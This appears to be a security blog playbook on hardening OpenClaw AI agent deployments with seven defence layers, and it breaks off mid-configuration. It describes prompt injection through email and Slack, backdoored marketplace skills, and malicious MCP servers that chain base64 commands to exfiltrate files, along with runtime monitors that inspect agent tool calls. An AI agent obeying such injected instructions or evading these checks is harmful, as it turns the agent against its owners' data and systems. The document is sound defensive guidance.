OpenClaw Security Playbook: 7-Layer Defense for AI Agents
OS credential isolation, VPN-only access, container sandboxing, and runtime security for production AI agents

Part 2 of 3 | ← Part 1: Attack Vectors and Verification | → Part 3: Detection and Threat Hunting
The Part 1 immediate mitigations - fixing network binding, rotating credentials, deleting backup files - stop attackers who found your exposed Gateway on Shodan. But they don't address the underlying architectural vulnerabilities.
If you stopped at Part 1, you're still vulnerable to:
Infostealer malware harvesting credentials from your next AI agent deployment (plaintext storage pattern remains)
Prompt injection via email or Slack achieving 91.3% success rate (no runtime guards)
Supply chain attacks through backdoored skills (no integrity monitoring)
Zero visibility into agent behavior when compromise occurs (no telemetry)
Within 72 hours of the January 2026 disclosures, attackers adapted infostealer malware to target these patterns. The Clawdbot vulnerabilities revealed architectural weaknesses affecting the entire AI agent ecosystem - not just one project.
This playbook is for: Security engineers, DevSecOps practitioners, and staff-level developers who own OpenClaw/Clawdbot agent deployments and need a concrete path from "we closed the obvious backdoors" to "we have a hardened, monitored, policy-driven production architecture."
By the end, you'll have: OS-level credential isolation (Keychain/Secret Service), VPN-only access, a hardened container runtime, runtime security plugins (openclaw-shield), supply chain integrity checks, and enterprise telemetry (openclaw-telemetry) — plus a 6-week rollout plan you can hand to your team. If you are running on NVIDIA's OpenShell sandbox, Cisco's DefenseClaw provides a unified implementation of Layers 3–6 and is referenced throughout as an alternative path.
Preflight: Before You Begin
If you haven't completed Part 1, run these verification checks first:
# Check 1: Gateway bound to localhost only
ss -lntp | grep 18789 2>/dev/null
# Expected: 127.0.0.1:18789 (NOT 0.0.0.0:18789)
# Check 2: No backup credential files
find ~/ \( -path "*/.moltbot/*" -o -path "*/.clawdbot/*" \) -name "*.bak*" 2>/dev/null
# Expected: No output
# Check 3: Tool logging enabled
grep -E "toolExecution|logging" ~/.moltbot/config.yml 2>/dev/null
# Expected: enabled: true
If any check fails: Complete Part 1's immediate mitigations before proceeding. Part 2 builds on those foundations.
Environment requirements:
Linux/macOS with CLI access (commands tested on Ubuntu 22.04 + macOS 14)
Docker/docker-compose for container sandboxing
Basic familiarity with YAML config, shell commands, and security operations
Table of Contents
Defense-in-Depth Strategy for OpenClaw Agents
Traditional application security assumes you can prevent initial compromise through perimeter defenses - firewalls, authentication, input validation. Agentic AI inverts this assumption.
The attack surface includes:
Model layer: Prompt injection manipulates decision-making (91.3% success rate)
Tool layer: Malicious skills introduce backdoored capabilities
Input layer: Untrusted data from email, Slack, Twitter
Storage layer: Credentials in plaintext files with backup persistence
Network layer: Localhost authentication bypass through proxies
You cannot perfectly defend all five layers simultaneously. Defense-in-depth accepts this reality and builds compensating controls.
The Seven-Layer Defense Model
Each layer provides independent protection so that compromise at one layer doesn't cascade:
graph TB
subgraph "Layer 1: Credential Isolation"
A["🔐 OS Keychain/Secret Service"]
end
subgraph "Layer 2: Network Segmentation"
B["🌐 VPN-Only Access"]
end
subgraph "Layer 3: Runtime Sandboxing"
C["📦 Container with Dropped Capabilities"]
end
subgraph "Layer 4: Runtime Security Enforcement"
D["🛡️ openclaw-shield Plugin"]
end
subgraph "Layer 5: Supply Chain Security"
E["✅ Manifest Integrity Checking"]
end
subgraph "Layer 6: Behavioral Monitoring"
F["📊 openclaw-telemetry + SIEM"]
end
subgraph "Layer 7: Organizational Controls"
G["🚨 openclaw-detect + IR Playbook"]
end
A --> B
B --> C
C --> D
D --> E
E --> F
F --> G
classDef infraLayer fill:#2E86AB,stroke:#1A5276,stroke-width:3px,color:#fff
classDef runtimeLayer fill:#00B894,stroke:#0B6B56,stroke-width:4px,color:#fff
classDef orgLayer fill:#6C5CE7,stroke:#4834DF,stroke-width:3px,color:#fff
class A,B,C infraLayer
class D,E,F runtimeLayer
class G orgLayer
Figure 1: Defense-in-depth for OpenClaw AI agents. Each layer provides independent protection. Compromise at Layer 1 (credential storage) is mitigated by Layer 3 (sandboxing). Compromise at Layer 5 (malicious skill) is detected by Layer 6 (behavioral monitoring). Green layers highlight community tools available since February 2026. For OpenShell-based deployments, DefenseClaw (Cisco, April 2026) implements Layers 3–6 as a single governance layer — see the individual layer sections below for integration points.
Threat Model
Primary threats:
External attacker with network access exploiting exposed Gateway port
Infostealer malware on user's machine targeting credential files and backups
Prompt injection via untrusted input achieving 91.3% success rate
Supply chain compromise through malicious skill injection
Insider threat with legitimate access attempting privilege escalation
Out of scope (requires different controls):
Physical access to unlocked machine
Compromised LLM provider API (Anthropic/OpenAI infrastructure breach)
Zero-day vulnerabilities in underlying OS or container runtime
State-level adversaries with custom exploits
6-Week Implementation Roadmap
This roadmap provides incremental deployment with measurable risk reduction at each phase. Week numbers map directly to defense layers.
Week 1: Stop Active Exploitation (Part 1 Review)
If you haven't completed Part 1:
[ ] Fix network binding (localhost only) - 5-10 min
[ ] Rotate exposed credentials - 45-90 min (5-10 min per service)
[ ] Delete backup files - 2-5 min
[ ] Enable basic logging - 30-45 min
Time investment: 2-3 hours Risk reduction: ~70% (stops active internet-based attacks)
Week 2: Layer 1 - OS Credential Isolation
[ ] Migrate credentials to OS Keychain/Secret Service
[ ] Verify plaintext files deleted
[ ] Configure Touch ID requirement (optional)
[ ] Test credential access audit logs
Time investment:
Experienced DevSecOps: 10-15 minutes
Mid-level engineer: 20-30 minutes
First-time migration: 45-60 minutes (includes troubleshooting)
Risk reduction: Additional ~15% (defeats infostealer malware)
Week 3-4: Layers 2-3 - Network & Container Sandboxing
Week 3: Layer 2 - VPN Setup
[ ] Deploy VPN (Tailscale or WireGuard)
[ ] Configure ACLs for device allowlisting
[ ] Test remote access via VPN
[ ] Remove reverse proxy if present
Week 4: Layer 3 - Container Hardening
[ ] Build hardened container image
[ ] Test containerized deployment
[ ] Verify capability dropping and read-only filesystem
[ ] Configure minimal volume mounts
Time investment: 8-12 hours total Risk reduction: Additional ~10% (limits blast radius, eliminates reverse proxy risk)
Week 5: Layers 4-6 - Runtime Security & Monitoring
[ ] Install openclaw-shield plugin
[ ] Enable Prompt Guard and Output Scanner layers
[ ] Deploy openclaw-telemetry for behavioral monitoring
[ ] Configure SIEM forwarding
[ ] Test alerting integration
[ ] Setup skill integrity monitoring (daily cron)
Time investment: 6-8 hours Risk reduction: Additional ~8% (prevents and detects attacks in real-time)
Week 6: Layer 7 - Organizational Controls
[ ] Deploy openclaw-detect via MDM
[ ] Document security policies
[ ] Establish incident response procedures
[ ] Train security team on agent-specific threats
[ ] Complete production deployment checklist
Time investment: 6-8 hours Risk reduction: Additional ~2% (governance, discovery, and response capabilities)
Total Implementation
Time: 5-6 weeks (part-time effort) Coverage: Addresses known failure modes from January-February 2026 disclosures Residual risk: Novel prompt injection patterns (requires continuous monitoring)
Layer 1: OS-Level Credential Isolation
Framework mapping: OWASP LLM06 (Sensitive Information Disclosure), NIST CSF PR.DS-1 (Data at rest protected)
Problem
Plaintext JSON files containing API keys sit in ~/.moltbot/ with mode 600 permissions. Infostealer malware runs as the user and inherits read access. Backup files persist after deletion, creating a 35-day window of credential exposure through .bak, .bak.1, .bak.2, .bak.3, and .bak.4 files.
Goal
All credentials stored in OS-native secure storage (Keychain on macOS, Secret Service on Linux) that requires explicit user authorization for each access. No plaintext files on filesystem. Credential access creates audit log entries. Optional biometric authentication prevents programmatic theft.
macOS: Keychain Integration
The migration process moves credentials from plaintext JSON to the Keychain, where they're protected by hardware-backed encryption. Each access can create an audit log entry visible in Keychain Access.app.
# Core migration logic - adds credentials to Keychain
security add-generic-password \
-s "Clawdbot-Anthropic" \
-a "api_key" \
-w "${ANTHROPIC_KEY}" \
-T "/Applications/Clawdbot.app" \
-U # Update if exists
# The -T flag authorizes specific apps to access without prompts
# Omit -T to require explicit user approval each time
Security model: Reduces plaintext exposure risk. Infostealer malware attempting access may trigger authorization prompts depending on configuration. Advanced setup requires Touch ID authentication, creating a visible authorization step that programmatic malware cannot bypass silently.
Linux: Secret Service Integration
Linux uses freedesktop.org Secret Service specification, implemented by GNOME Keyring or KWallet.
# Core migration logic - stores credential in Secret Service
echo -n "${ANTHROPIC_KEY}" | secret-tool store \
--label="Clawdbot Anthropic API Key" \
service "clawdbot-anthropic" \
account "api_key"
# List all Clawdbot credentials
secret-tool search service clawdbot-anthropic
# Retrieve specific credential (for testing)
secret-tool lookup service clawdbot-anthropic account api_key
→ Complete macOS migration script with credential extraction, error handling, backup procedures, and verification steps.
→ Complete Linux migration script with dependency installation and Secret Service configuration.
If you want to extend credential isolation beyond the keychain, consider the IronCurtain architecture. IronCurtain separates the agent’s runtime from real secrets: the agent receives a fake API key and submits actions through a trusted proxy. A MITM component swaps in the real credential only at the last moment, so the agent container never holds the secret. A policy engine written in plain English then decides whether to allow, deny or require escalation for each call with default-deny and full audit logs. This pattern protects against runtime theft of credentials and provides a deterministic audit trail for every action.
⚡ QUICK WIN
Migrate Credentials to OS Keychain Right Now
What it does: Moves API keys from plaintext JSON files to OS-encrypted storage.
Why it matters: Eliminates the primary infostealer target. Even if malware runs as your user, credential access can require explicit authorization and creates an audit trail.
Time estimate:
Experienced DevSecOps engineer: 10-15 minutes
Mid-level security engineer: 20-30 minutes
First-time credential migration: 45-60 minutes (includes troubleshooting)
Prerequisites:
macOS 10.15+ or Linux with GNOME Keyring/KWallet installed
Basic familiarity with command-line tools
Backup of current credential files (script handles this)
Step 1 - Download migration script:
# macOS
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/credential-migration/macos/migrate_credentials_macos.sh
# Review before running (security best practice)
less migrate_credentials_macos.sh
chmod +x migrate_credentials_macos.sh
# Linux
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/credential-migration/linux/migrate_credentials_linux.sh
less migrate_credentials_linux.sh
chmod +x migrate_credentials_linux.sh
sudo apt-get install libsecret-tools # Install dependencies
Step 2 - Run migration:
# Creates backup, migrates credentials, securely deletes plaintext
./migrate_credentials_macos.sh # macOS
# OR
./migrate_credentials_linux.sh # Linux
Step 3 - Restart and verify:
# Restart Gateway
systemctl restart moltbot
# Verify no plaintext credentials remain
grep -r "api_key" ~/.moltbot/ ~/.clawdbot/ 2>/dev/null
# Should return NO matches (or only configuration references, not actual keys)
# Verify credentials accessible from Keychain
# macOS: Open Keychain Access.app, search for "Clawdbot"
# Linux: secret-tool search service clawdbot-anthropic
Expected results:
✓ Credentials migrated to Keychain/Secret Service
✓ First Gateway access may prompt for authorization (depends on configuration)
✓ No plaintext keys in filesystem
✓ Backup files securely deleted (3-pass overwrite)
If migration fails:
Check backup location (printed during migration): typically
~/backups/clawdbot-YYYYMMDD/Restore:
cp ~/backups/clawdbot-YYYYMMDD/clawdbot.json ~/.moltbot/clawdbot.jsonReview troubleshooting guide: Migration failure scenarios
Impact: Reduces plaintext credential exposure. Infostealer malware loses immediate access to credential files. Optional Touch ID requirement adds visible authorization step.
Optional hardening - Touch ID requirement (macOS only):
# Require Touch ID for high-value credentials
# Test on your macOS version first - behavior varies by OS release
security set-generic-password-partition-list \
-s "Clawdbot-Anthropic" \
-a "api_key" \
-S
# Verify: Next credential access should prompt for Touch ID
# If it doesn't, ACL configuration may need adjustment for your OS version
Note: Touch ID enforcement behavior depends on how Keychain items are created and your macOS version. Treat this as risk reduction, not a guarantee. The migration script documents tested configurations.
→ Troubleshooting credential migration for common issues and rollback procedures.
Layer 2: Network Segmentation with VPN
Framework mapping: OWASP LLM04 (Supply Chain Vulnerabilities - network access), NIST CSF PR.AC-5 (Network integrity)
Problem
Reverse proxies introduce authentication bypass vulnerabilities through header spoofing. Even properly configured proxies expand attack surface by exposing the Gateway to the network. Over 1,200 instances were exploited through X-Forwarded-For manipulation and trustedProxies misconfiguration.
Goal
Zero public port exposure. Encrypted point-to-point connections between authenticated devices only. Gateway stays bound to 127.0.0.1. Remote access via VPN eliminates reverse proxy attack surface entirely.
Why VPN > Reverse Proxy
Reverse proxy risks:
Header spoofing attacks (
X-Forwarded-Formanipulation)TLS termination exposes plaintext traffic on proxy server
Misconfiguration fails open (grants access instead of denying)
Proxy itself becomes attack target
VPN advantages:
Encrypted tunnel prevents header manipulation
No port exposure (Gateway stays on
127.0.0.1)Misconfiguration fails closed (no connectivity = no access)
Zero-trust architecture (device authentication required)
Tailscale Setup (Recommended)
Tailscale provides zero-config VPN using WireGuard protocol. Installation creates a private mesh network where only your authenticated devices can reach the Gateway.
# Download and inspect install script (security best practice)
curl -fsSLo install-tailscale.sh https://tailscale.com/install.sh
less install-tailscale.sh # Review before executing
# Run installation
sh install-tailscale.sh
# Authenticate and join your network
sudo tailscale up
# Get your machine's Tailscale IP
tailscale ip -4
# Example output: 100.101.102.103
How it works: Tailscale creates encrypted tunnel between your devices. Gateway stays bound to 127.0.0.1, but Tailscale forwards traffic from your authenticated devices to localhost on the Gateway machine. The Gateway sees connections as coming from 127.0.0.1 (via Tailscale's network stack), but only devices authenticated to your tailnet can reach it. No public port exposure, no authentication bypass risk.
Data path: Client → Tailscale encrypted tunnel → Gateway host network stack → 127.0.0.1:18789 listener. Only Tailscale peers can reach the Gateway; still no public listener.
Verify setup:
# Gateway should still bind to localhost only
ss -lntp | grep 18789 2>/dev/null
# Expected: 127.0.0.1:18789 (NOT 0.0.0.0 or Tailscale IP)
# Access from other devices via: http://100.101.102.103:18789
→ Complete Tailscale setup guide with ACL configuration, device allowlisting, and troubleshooting.
→ WireGuard alternative setup for users who prefer open-source solutions without third-party coordination.
Network Access Control List (ACL)
Tailscale ACLs define which devices can reach which services. This prevents compromise of one device from exposing all services.
{
"acls": [
{
"action": "accept",
"src": ["user@example.com"],
"dst": ["tag:clawdbot:18789"]
}
],
"tagOwners": {
"tag:clawdbot": ["user@example.com"]
}
}
This configuration ensures only devices authenticated as user@example.com can reach port 18789 on machines tagged as clawdbot.
→ View complete network segmentation guide with VPN comparison, ACL examples, and firewall integration.
Layer 3: Runtime Sandboxing with Containers
Framework mapping: OWASP LLM09 (Excessive Agency), NIST CSF PR.PT-3 (Least functionality)
Problem
When the agent is compromised via prompt injection or malicious skill, it has full access to the user's filesystem, credentials, and network. A successful prompt injection becomes a privilege escalation path.
Goal
Agent runs in isolated container with dropped capabilities, read-only filesystem, and explicit volume mounts for only necessary directories. Compromise is contained within sandbox boundaries. No persistence across restarts.
Docker Security Configuration
Standard Docker deployment runs with excessive privileges. This hardened configuration drops all capabilities by default, then explicitly grants only required permissions.
# Dockerfile.hardened - Secure container configuration
FROM python:3.11-slim
# Run as non-root user
RUN useradd -m -u 1000 -s /bin/bash clawdbot
USER clawdbot
WORKDIR /home/clawdbot
# Install dependencies
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
# Copy application
COPY --chown=clawdbot:clawdbot . .
# Default command
CMD ["python", "gateway.py"]
Container runtime flags:
docker run \
--name clawdbot \
--network isolated \
--cap-drop ALL \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=100m \
-v ~/.moltbot/skills:/app/skills:ro \
-v ~/.moltbot/logs:/app/logs:rw,noexec \
--security-opt=no-new-privileges \
clawdbot:hardened
# Note: Removed --cap-add NET_BIND_SERVICE (unnecessary for port >1024)
# Gateway uses port 18789, which doesn't require privileged binding
What this prevents:
--cap-drop ALL: Removes all Linux capabilities (can't change users, mount filesystems, modify network config)--read-only: Prevents writing to container filesystem (stops malware persistence)--tmpfs /tmp: Temporary directory with noexec cleared on restart (non-persistent workspace)--security-opt=no-new-privileges: Prevents privilege escalationVolume mounts are read-only except for logs (which have noexec)
Even if prompt injection achieves code execution, the blast radius is limited to the container's isolated environment. No filesystem persistence, no capability to modify host system.
Filesystem Isolation Strategy
Map only necessary directories into the container:
# docker-compose.yml - Production configuration
services:
clawdbot:
image: clawdbot:hardened
read_only: true
cap_drop:
- ALL
# Note: Removed cap_add - port 18789 doesn't require NET_BIND_SERVICE
volumes:
# Skills - read-only (prevent skill tampering)
- ~/.moltbot/skills:/app/skills:ro
# Logs - read-write but no exec permissions
- ~/.moltbot/logs:/app/logs:rw,noexec
# Config - read-only
- ~/.moltbot/config.yml:/app/config.yml:ro
# CRITICAL: DO NOT MOUNT ~/.ssh, ~/.aws, or credential directories
# Agent reads credentials from OS Keychain via API, not filesystem
tmpfs:
# Temporary workspace - cleared on restart, no execution allowed
- /tmp:rw,noexec,nosuid,size=100m
security_opt:
- no-new-privileges:true
# Use default seccomp profile (do NOT set seccomp:unconfined)
# For advanced hardening, provide custom seccomp profile path
networks:
- isolated
restart: unless-stopped
Critical exclusions: Never mount ~/.ssh, ~/.aws, or credential directories. Agent should read credentials from OS Keychain via API (Layer 1), not direct filesystem access.
Advanced hardening: For production environments requiring maximum security, provide a custom seccomp profile that explicitly allows only required syscalls. Default seccomp is adequate for most deployments; unconfined mode should only be used for debugging and expands syscall attack surface.
→ View complete Docker hardening configuration with orchestration, health checks, and resource limits.
→ Dockerfile.hardened with multi-stage builds and security scanning integration.
→ Runtime sandboxing guide with container security best practices and escape prevention.
April 2026 — OpenShell alternative: If your deployment runs on NVIDIA's OpenShell sandbox, DefenseClaw uses OpenShell as its Layer 3 enforcement boundary rather than Docker — providing kernel-level enforcement of filesystem and network I/O constraints. The security properties are equivalent to
--cap-drop ALL+--read-onlyat the container level but enforced by OpenShell's eBPF-based policy engine. If you are running Docker on a non-OpenShell host, the configuration above remains the correct approach. These are two different runtime paths, not competing solutions.
Layer 4: Runtime Security Enforcement
Framework mapping: OWASP LLM01 (Prompt Injection), LLM09 (Excessive Agency), NIST CSF PR.AC & PR.PT
Problem
Even with sandboxing, compromised agents can misuse allowed tools - reading sensitive files, sending unauthorized emails, or executing malicious code within permitted boundaries. The 91.3% prompt injection success rate demonstrates that input validation alone cannot prevent attacks.
Goal
Runtime security plugins inspect and block dangerous tool invocations before execution, validate outputs for secrets, and enforce security policies at the agent layer. Multiple independent defense mechanisms create overlapping protection.
Production-Ready Security Plugin: openclaw-shield
The security community developed native OpenClaw plugins providing defense-in-depth at the runtime layer in direct response to January-February 2026 vulnerabilities.
openclaw-shield (Knostic) provides five independent defense layers as a native OpenClaw plugin:
# Install as OpenClaw plugin
cd ~/.openclaw/plugins
git clone https://github.com/knostic/openclaw-shield
# Configure in OpenClaw settings
# Each layer can be enabled/disabled independently
The five defense layers:
Prompt Guard: Injects security policy into agent context before each turn, instructing the model to refuse dangerous requests
Output Scanner: Redacts secrets (API keys, tokens) and PII from tool output before returning to user
Tool Blocker: Blocks dangerous tool calls at host level based on configurable allowlist/denylist
Input Audit: Logs all inbound messages and flags accidental secret exposure in user input
Behavioral Analysis: Monitors tool execution patterns for anomalous sequences
Each layer is independently toggleable, allowing gradual rollout in production environments without disrupting existing workflows.
→ View openclaw-shield with complete configuration guide and layer-specific documentation.
→ Read Knostic implementation blog for architecture decisions and lessons learned from production deployments.
An emerging alternative for runtime interception is AgentGuard, a GoPlus Security tool that intercepts high-risk actions and performs on-demand deep scanning. It blocks malicious skills, prevents writes to sensitive files and performs static analysis to detect secrets, backdoors, prompt-injection and other threats.
JavaScript/TypeScript Alternative: ClawGuard
For agents built with JavaScript/TypeScript frameworks, clawguard (Capsule Security) provides similar runtime protection via NPM package:
import { GuardSystem, guardTool } from 'clawguard';
const guard = new GuardSystem({
strictMode: true,
runtime: {
highRiskTools: ['send_email', 'execute_code'],
rateLimits: {
send_email: { maxCalls: 10, windowMs: 60000 }
},
onApprovalRequired: async (req) => {
return confirm(`Allow \({req.tool} with args: \){JSON.stringify(req.args)}?`);
}
}
});
// Wrap tools with runtime guards
const safeSendEmail = guardTool(originalSendEmail, 'send_email', guard);
ClawGuard uses pre-tool invocation hooks to validate every tool call before execution, with support for rate limiting, approval workflows, and output validation.
→ View clawguard on NPM with complete API reference and TypeScript types.
→ Browse clawguard on GitHub with source code and integration examples.
Native Configuration: Tool Execution Policies
For custom implementations or environments where native plugins aren't available:
# ~/.moltbot/config.yml - Runtime security enforcement
tools:
# Completely disable high-risk tools
disabled:
- "exec"
- "shell"
- "python_repl"
# Require human confirmation for sensitive operations
requireConfirmation:
- tool: "email_send"
confirmationMessage: "Send email to {recipients} with subject: {subject}"
- tool: "file_write"
confirmationMessage: "Write to file: {path}"
# Restrict tool access to specific paths
restricted:
- tool: "file_read"
allowedPaths: ["~/Documents", "~/Projects"]
deniedPaths: ["~/.ssh", "~/.moltbot", "~/.aws"]
# Rate limiting prevents automated exploitation
rateLimits:
email_send:
maxPerHour: 20
browser_action:
maxPerHour: 100
→ View complete tool policy configurations with approval workflows and least-privilege examples.
April 2026 — Additional runtime option: Cisco's DefenseClaw provides a plugin-based inspection engine that intercepts LLM prompts, completions, and tool invocations at the OpenClaw plugin layer — a different interception point than openclaw-shield's native plugin hooks. DefenseClaw adds CodeGuard, which scans agent-generated code at execution time for secrets exposure, command injection, and unsafe deserialization patterns before the code reaches
execorpython_repl. It supports monitor mode (logs everything, blocks nothing — useful for baselining) and action mode (blocks on policy violation).The two tools cover different interception planes and can be run together:
- openclaw-shield intercepts at the OpenClaw native plugin layer (Prompt Guard, Output Scanner, Tool Blocker)
- DefenseClaw intercepts at the OpenShell governance layer and adds CodeGuard for generated code
For OpenShell deployments, add DefenseClaw's runtime inspection as a second enforcement plane alongside openclaw-shield.
# DefenseClaw runtime inspection config (defenseclaw.config.yml)
runtime:
mode: "action" # "monitor" | "action"
inspect:
prompts: true # Scan incoming prompts for injection patterns
completions: true # Scan LLM outputs before tool dispatch
tool_invocations: true # Intercept tool calls before execution
codeguard:
enabled: true
patterns:
- secrets_exposure
- command_injection
- unsafe_deserialization
block_on_match: true
Layer 5: Supply Chain Integrity Monitoring
Framework mapping: OWASP LLM04 (Model Supply Chain Vulnerabilities), NIST CSF ID.SC & PR.IP-3
Problem
Researcher Jamieson O'Reilly inflated a backdoor skill to 4,000 fake downloads across 7 countries before terminating the demonstration. The ClawdHub registry provided no cryptographic verification of skill integrity. OX Security analysis revealed 26% of skill plugins contain vulnerabilities.
Goal
Manifest-based integrity monitoring with cryptographic hashing detects unauthorized skill modifications - whether by attacker, malicious update, or compromised registry. Daily automated comparison triggers alerts within 24 hours of tampering.
Skill Integrity Manifest Generation
Generate cryptographic hashes of all installed skills to detect unauthorized modifications:
# Core manifest generation - creates SHA256 hash registry
import hashlib
from pathlib import Path
def generate_skill_manifest(skills_dir):
manifest = {}
for skill_file in skills_dir.rglob('*.md'):
with open(skill_file, 'rb') as f:
manifest[str(skill_file)] = hashlib.sha256(f.read()).hexdigest()
return manifest
# Daily cron job compares current hashes against baseline
# Any mismatch indicates skill tampering
The production implementation adds metadata extraction, dangerous pattern detection (eval, exec, innerHTML), and automated alerting when changes are detected.
→ View skill_manifest.py with full implementation including metadata extraction, dangerous pattern scanning, CLI interface, and manifest comparison.
Usage:
# Generate baseline manifest
python3 skill_manifest.py --output manifest_baseline.json
# Compare and alert on changes
python3 skill_manifest.py --compare manifest_baseline.json --output manifest_today.json
# Output shows:
# ⚠ CHANGES DETECTED:
# Added skills: 1
# Modified skills: 2
# - skills/email-search.md
# - skills/browser-automation.md
Automated Daily Monitoring
Integrate manifest generation into daily monitoring via cron job:
# skill_integrity_monitor.sh - Daily integrity check
MANIFEST_DIR="${HOME}/.moltbot/manifests"
TODAY=$(date +%Y%m%d)
YESTERDAY=$(date -d "yesterday" +%Y%m%d 2>/dev/null || date -v-1d +%Y%m%d)
# Generate today's manifest
python3 skill_manifest.py --output "\({MANIFEST_DIR}/manifest_\){TODAY}.json"
# Compare with yesterday
if [ -f "\({MANIFEST_DIR}/manifest_\){YESTERDAY}.json" ]; then
python3 skill_manifest.py \
--compare "\({MANIFEST_DIR}/manifest_\){YESTERDAY}.json" \
--output "\({MANIFEST_DIR}/manifest_\){TODAY}.json" 2>&1 | \
grep "CHANGES DETECTED" && \
mail -s "ALERT: Skill Integrity Violation" security@company.com
fi
Add to crontab: 0 2 * * * /path/to/skill_integrity_monitor.sh
→ View skill_integrity_monitor.sh with complete implementation, error handling, and cleanup procedures.
Skill Vetting Configuration
Implement approval workflow for new skills with version pinning and permission restrictions:
# ~/.moltbot/config.yml - Skill security settings
skills:
autoUpdate: false # CRITICAL: Disable automatic updates
installationPolicy:
mode: "require-approval"
allowedSources:
- "clawdhub://official/*" # Only official skills
requireManifest: true
manifestValidation:
checkSignature: true
installed:
- name: "email-search"
version: "1.2.3" # Pin exact version
sha256: "a3f5b8c9d1e2f3a4b5c6d7e8f9a0b1c2..."
permissions:
- "read:email"
deniedPermissions:
- "exec:shell"
- "file:write"
This configuration prevents automatic skill updates (supply chain attacks), installation from untrusted sources, and permission escalation.
→ Browse skill policy examples: Allowlists, dangerous pattern definitions, manifest schemas.
→ Supply chain security guide with skill vetting process, CI/CD integration, and incident response procedures.
April 2026 — Pre-install scanning gap: The manifest integrity approach in this layer is excellent at detecting post-install drift — unauthorized modification of skills already on disk. It has one gap: it cannot vet a skill before you install it. DefenseClaw's supply chain scanner fills that gap. It scans skills, plugins, and MCPs at install time and via continuous directory monitoring, blocking packages with critical/high severity findings before they reach
~/.openclaw/skills/.Recommended combined workflow:
- Pre-install:
defenseclaw scan supply-chain --skill ./skills/new-skill.md --severity-threshold high- Install the skill if scan passes
- Baseline the manifest (existing script in this repo)
- Daily drift detection via the manifest cron job (existing script in this repo)
DefenseClaw covers MCPs in addition to skills — the manifest scripts in this repo currently cover skills only. If you use MCP packages, add DefenseClaw scanning to close that gap.
Pre-install Checks for OpenClaw Skills with skill-auditor and setup-auditor
The OpenClaw-Skills-Security project offers two auditor skills—skill-auditor and setup-auditor—to analyse skills and environments before installation. To use skill-auditor, embed skills/skill-auditor/SKILL.md into your agent, add the skill under review and request an audit. This six-stage process checks metadata (including typosquatting and malicious naming), inspects permissions, audits dependencies, scans for prompt-injections, reviews network/exfiltration behaviour and looks for other red flags. It returns one of four statuses: SAFE, SUSPICIOUS, DANGEROUS or BLOCK.
Setup-auditor goes a step further by verifying the runtime environment. It scans for credential leaks, reviews configuration files, assesses whether a sandbox is properly configured and looks for persistent processes. Results are classified as READY, RISKY or NOT_READY. Together, these tools help you detect malicious or misconfigured skills before deployment and ensure your environment is properly locked down.
Recent research highlights a new threat: malicious MCP servers. Praetorian’s MCPHammer shows that both local and third-party MCP servers can execute arbitrary code, exfiltrate data and manipulate users. An especially dangerous tactic chains a malicious local server with a trusted remote server via base64 commands delivered in chat messages, causing invisible actions such as launching applications or exfiltrating files. There are also supply-chain risks: typos in an MCP configuration file can cause the uncontrollable uvx package manager to fetch and run malicious packages. To address this gap, include MCP server configurations in your integrity checks and use MCPHammer as a red-teaming tool to test your defences.
⚡ QUICK WIN
Setup Skill Integrity Monitoring Right Now
What it does: Creates cryptographic manifest of installed skills, enabling detection of unauthorized modifications.
Why it matters: 26% of skill plugins contain vulnerabilities. Jamieson O'Reilly demonstrated skills can be modified post-installation. Manifest monitoring catches tampering within 24 hours.
Time estimate:
Familiar with Python scripting: 10-15 minutes
Basic Python experience: 20-25 minutes
New to cron jobs: 30-40 minutes (includes cron configuration)
Prerequisites:
Python 3.7+ installed
Git installed and configured
Basic understanding of cryptographic hashing (helpful but not required)
Step 1 - Generate initial manifest:
# Download script
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/supply-chain/skill_manifest.py
# Review before running
less skill_manifest.py
chmod +x skill_manifest.py
# Generate baseline manifest
python3 skill_manifest.py --output manifest_baseline.json
# Review security warnings
python3 skill_manifest.py 2>&1 | grep "WARNING"
Step 2 - Commit baseline to version control:
git add manifest_baseline.json
git commit -m "Add skill integrity baseline"
git push
Step 3 - Setup daily monitoring:
# Add to crontab (runs 2 AM daily)
(crontab -l 2>/dev/null; echo "0 2 * * * cd /path/to/clawdbot && python3 skill_manifest.py --compare manifest_baseline.json --output manifest_today.json") | crontab -
Expected results:
✓ Baseline manifest generated with SHA256 hashes
✓ Security warnings for dangerous patterns (if present)
✓ Daily comparison detects modifications
✓ Alerts sent on unauthorized changes
[ ] DefenseClaw supply chain scanner run on all installed skills and MCPs:
defenseclaw scan supply-chain --dir ~/.openclaw/skills/[ ] DefenseClaw continuous directory monitoring enabled for
~/.openclaw/skills/and MCP directories
Impact: Any unauthorized skill modification - whether by attacker, malicious update, or compromised registry - triggers alert within 24 hours.
Layer 6: Behavioral Monitoring with Telemetry
Framework mapping: OWASP LLM01 (Prompt Injection - detection), NIST CSF DE.AE & DE.CM
Problem
Prompt injection achieving 91.3% success rate means input validation alone cannot prevent attacks. The model cannot reliably distinguish attacker instructions from legitimate user requests. Static defenses fail against novel attack patterns.
Goal
Monitor runtime behavior for anomalies indicating compromise - unusual tool sequences, off-hours execution, suspicious data patterns, failed authorization attempts. Enterprise-grade telemetry with tamper-proof audit trails enables detection and forensics.
Production Telemetry: openclaw-telemetry
For production deployments, openclaw-telemetry (Knostic) provides enterprise-grade behavioral monitoring as a native OpenClaw plugin:
# Install as OpenClaw plugin
cd ~/.openclaw/plugins
git clone https://github.com/knostic/openclaw-telemetry
# Outputs to JSONL with optional syslog forwarding
tail -f ~/.openclaw/logs/telemetry.jsonl | jq '.tool_name'
Key features:
Tool call capture: Every tool invocation logged with timestamp, arguments, and result
LLM usage tracking: Token consumption, model selection, response times
Agent lifecycle events: Session start/stop, configuration changes, errors
Message events: All inbound/outbound messages with metadata
Sensitive data redaction: Automatic removal of secrets from logs
Tamper-proof hash chains: Each event cryptographically linked to previous event, making tampering detectable
Rate limiting: Built-in log volume management
SIEM integration: Optional CEF/syslog forwarding for centralized monitoring
Tamper-proof audit trails: Hash chains ensure log integrity by creating a cryptographic link between each event and the previous event. If an attacker modifies any log entry, the hash chain breaks and tampering becomes immediately detectable.
→ View openclaw-telemetry with complete installation guide, configuration options, and SIEM integration examples.
→ Read community deployment discussion about openclaw-telemetry production experiences.
SIEM Integration for Centralized Monitoring
openclaw-telemetry supports forwarding to enterprise SIEM systems:
# openclaw-telemetry configuration
telemetry:
output:
